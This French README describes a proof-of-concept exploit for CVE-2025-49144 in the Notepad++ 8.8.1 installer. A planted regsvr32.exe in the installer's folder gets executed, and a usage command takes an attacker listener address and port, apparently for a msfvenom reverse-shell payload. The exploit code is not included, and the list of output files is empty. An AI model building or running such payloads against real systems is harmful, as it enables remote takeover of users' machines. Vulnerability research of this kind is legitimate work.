
Preuve de concept (PoC) qui exploite la vulnérabilité CVE-2025-49144 dans l'installateur Notepad++ 8.8.1.
Ce dépôt contient une preuve de concept (PoC) fonctionnelle qui exploite la vulnérabilité CVE-2025-49144 dans l'installateur Notepad++ 8.8.1. L'exécution malveillante se produit en plaçant un binaire (regsvr32.exe) dans le même répertoire que l'installateur vulnérable. Lorsque l'installateur est exécuté, il hérite du contexte et déclenche la charge utile.
⚠️ Avertissement
Ce code est strictement destiné à des fins éducatives et de recherche uniquement. Une utilisation non autorisée sur des systèmes sans permission explicite peut constituer une violation de la loi.
L'auteur n'est pas responsable de toute utilisation abusive ou malveillante de cet outil.
msfvenom (partie de Metasploit Framework)mingw-w64 (x86_64-w64-mingw32-gcc)npp.8.8.1.Installer.x64.exe (doit être placé manuellement dans le même répertoire)python3 exploit.py -i <LHOST> -p <LPORT>
Exemple :
python3 exploit.py -i 192.168.100.10 -p 4444
Cela générera les fichiers suivants :
[
]